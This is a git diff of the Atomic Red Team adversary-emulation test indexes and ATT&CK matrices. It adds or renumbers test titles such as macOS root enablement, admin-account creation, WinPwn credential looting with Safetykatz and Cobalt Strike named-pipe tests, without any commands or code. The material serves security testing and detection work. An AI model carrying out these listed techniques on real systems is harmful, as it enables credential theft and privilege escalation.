+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 
 # exfiltration
 - T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index 3985180e..7c49a070 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -54,6 +54,7 @@
   - Atomic Test #4: Base64 decoding with Perl [linux, macos]
   - Atomic Test #5: Base64 decoding with shell utilities [linux, macos]
   - Atomic Test #6: Hex decoding with shell utilities [linux, macos]
+  - Atomic Test #7: Linux Base64 Encoded Shebang in CLI [linux, macos]
 - T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036 Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md
index e3d5e5a2..dde3ae10 100644
--- a/atomics/Indexes/Indexes-Markdown/macos-index.md
+++ b/atomics/Indexes/Indexes-Markdown/macos-index.md
@@ -48,6 +48,7 @@
   - Atomic Test #4: Base64 decoding with Perl [linux, macos]
   - Atomic Test #5: Base64 decoding with shell utilities [linux, macos]
   - Atomic Test #6: Hex decoding with shell utilities [linux, macos]
+  - Atomic Test #7: Linux Base64 Encoded Shebang in CLI [linux, macos]
 - T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036 Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -156,6 +157,9 @@
 - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # collection
@@ -302,6 +306,9 @@
 - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
 
 # privilege-escalation
 - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -376,6 +383,9 @@
 - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
 
 # credential-access
 - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -661,6 +671,9 @@
 - T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
 
 # exfiltration
 - T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 62e1581f..064625cc 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -492,8 +492,8 @@
 - T1118 InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1127 Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md)
   - Atomic Test #1: Lolbin Jsc.exe compile javascript to exe [windows]
@@ -721,8 +721,8 @@
   - Atomic Test #1: Netsh Helper DLL Registration [windows]
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 - [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
   - Atomic Test #1: User scope COR_PROFILER [windows]
   - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -815,7 +815,12 @@
   - Atomic Test #22: Abuse Nslookup with DNS Records [windows]
 - T1170 Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1559 Inter-Process Communication](../../T1559/T1559.md)
+  - Atomic Test #1: Cobalt Strike Artifact Kit pipe [windows]
+  - Atomic Test #2: Cobalt Strike Lateral Movement (psexec_psh) pipe [windows]
+  - Atomic Test #3: Cobalt Strike SSH (postex_ssh) pipe [windows]
+  - Atomic Test #4: Cobalt Strike post-exploitation pipe (4.2 and later) [windows]
+  - Atomic Test #5: Cobalt Strike post-exploitation pipe (before 4.2) [windows]
 - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1028 Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1059.006 Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1070,8 +1075,8 @@
 - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 - [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
   - Atomic Test #1: User scope COR_PROFILER [windows]
   - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -1364,6 +1369,7 @@
   - Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows]
   - Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows]
   - Atomic Test #5: GetCurrent User with PowerShell Script [windows]
+  - Atomic Test #6: System Discovery - SocGholish whoami [windows]
 - T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1615 Group Policy Discovery](../../T1615/T1615.md)
@@ -1736,8 +1742,8 @@
 - T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 
 # exfiltration
 - T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md
index bcc401ba..a721207f 100644
--- a/atomics/Indexes/Matrices/matrix.md
+++ b/atomics/Indexes/Matrices/matrix.md
@@ -20,7 +20,7 @@
 | Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppleScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Window Discovery](../../T1010/T1010.md) | Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
-| [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data](../../T1560/T1560.md) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Cloud Infrastructure Discovery](../../T1580/T1580.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data](../../T1560/T1560.md) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -39,7 +39,7 @@
 |  | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Escape to Host](../../T1611/T1611.md) | [Indicator Removal on Host: Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Login Item [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) |  | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | [Cloud Service Discovery](../../T1526/T1526.md) |  |  |  | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  | [Inter-Process Communication](../../T1559/T1559.md) | Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Network Service Scanning](../../T1046/T1046.md) |  |  |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
 |  | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Software Discovery](../../T1518/T1518.md) |  |  |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
 |  | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md
index 253a1844..e8b5a1b0 100644
--- a/atomics/Indexes/Matrices/windows-matrix.md
+++ b/atomics/Indexes/Matrices/windows-matrix.md
@@ -24,7 +24,7 @@
 | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Hide Artifacts](../../T1564/T1564.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [File and Directory Discovery](../../T1083/T1083.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Video Capture](../../T1125/T1125.md) |  | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection](../../T1055/T1055.md) | Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  | [Inter-Process Communication](../../T1559/T1559.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection](../../T1055/T1055.md) | Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
